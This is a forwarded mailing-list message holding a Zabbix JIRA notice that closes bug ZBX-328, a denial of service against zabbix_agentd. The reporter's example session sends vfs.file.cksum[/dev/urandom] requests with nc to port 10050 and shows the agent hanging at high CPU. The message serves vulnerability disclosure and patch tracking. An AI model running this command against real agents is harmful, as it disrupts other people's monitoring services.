hi,
see upstreams response.
----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL
PROTECTED]> -----
From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: [EMAIL PROTECTED]
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd
[
https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Alexei Vladishev closed ZBX-328.
--------------------------------
Resolution: Fixed
The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be
released this week.
Alexei
> Possible DoS against zabbix-agentd
> ----------------------------------
>
> Key: ZBX-328
> URL: https://support.zabbix.com/browse/ZBX-328
> Project: ZABBIX
> Issue Type: Bug
> Components: Agent (Unix)
> Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU
> 2.80GHz
> Reporter: Milen Rangelov
> Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU
> resources.
> This can be triggered by sending the agent a file checksum request
> (vfs.file.cksum[file]) with file argument being some "special" device file
> like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then
> the zabbix_agentd service will not be able to serve any requests until it's
> restarted.
> Here's some example session :
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050
> &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050
> &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050
> &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050
> &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie
> Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
> <snip>
> PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
> 24381 zabbix 30 5 5056 1032 768 R 65 0.1 4:16.01 zabbix_agentd
> 24382 zabbix 30 5 5068 1044 776 R 50 0.1 4:12.18 zabbix_agentd
> 24380 zabbix 30 5 5068 1044 776 R 50 0.1 4:01.24 zabbix_agentd
> 24379 zabbix 30 5 5056 1036 772 R 31 0.1 4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so
> hard to spoof it if he's on the same ethernet segment as the host running the
> zabbix_agent.
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira
----- End forwarded message -----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]